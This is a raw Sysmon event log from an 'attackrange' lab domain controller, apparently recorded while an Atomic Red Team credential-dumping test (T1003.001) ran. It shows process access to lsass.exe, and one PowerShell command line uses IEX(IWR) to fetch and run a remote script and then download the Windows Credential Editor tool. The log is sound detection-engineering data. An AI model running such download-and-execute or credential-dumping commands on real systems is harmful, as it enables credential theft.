21:09:49.615{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3
504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 
154100x800000000000000024769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.622{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$parentpath = Split-Path \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\""; $zippath = \""$parentpath\wce.zip\"" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR \""https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\"" -UseBasicParsing) if(Invoke-WebRequestVerifyHash \""https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip\"" \""$zippath\"" 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933){ Expand-Archive $zippath $parentpath\wce -Force Move-Item $parentpath\wce\wce.exe \""C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe\"" Remove-Item $zippath, $parentpath\wce -Recurse }} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000024768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000024767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000024766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.584{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.505{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C3271E326095CC3C4BE43B874C99926B,SHA256=03FB77BC731342A7147F5514ABB574D5A40E6979BC674317B4331C5445237990,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.474{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.474{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDB71816182E375E6B0AB8A92253D474,SHA256=43F42ABE4F3D52CD9DAC1D0AB9F8ABC7EF90487C8BE6E4C43214DA807E697474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D6272D28BFD96DCF152D000E46C3A6B,SHA256=9D220A53E0276502EF412A32BA8666F07005FC5A380D76486BE70A7C10FC7C60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.427{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000024758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9EA6A2BCBBC56F628850DD3CED09B80C,SHA256=950E3AA75AA1DA6B8E114DEB9B7B0841E1144ED5DF503FCABEB2C813AE488818,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000024757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:49.412{4DB9351A-A31D-60D3-2906-00000000CF01}1920\PSHost.132689561893317035.1920.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.396{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dt0mpapq.anj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.396{4DB9351A-A31D-60D3-2906-00000000CF01}1920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ieaiioef.4dc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.380{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ieaiioef.4dc.ps12021-06-23 21:09:49.380 10341000x800000000000000024753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.365{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.334{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.334{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.318{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.318{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3
504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 
154100x800000000000000024744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.331{4DB9351A-A31D-60D3-2906-00000000CF01}1920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.745{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 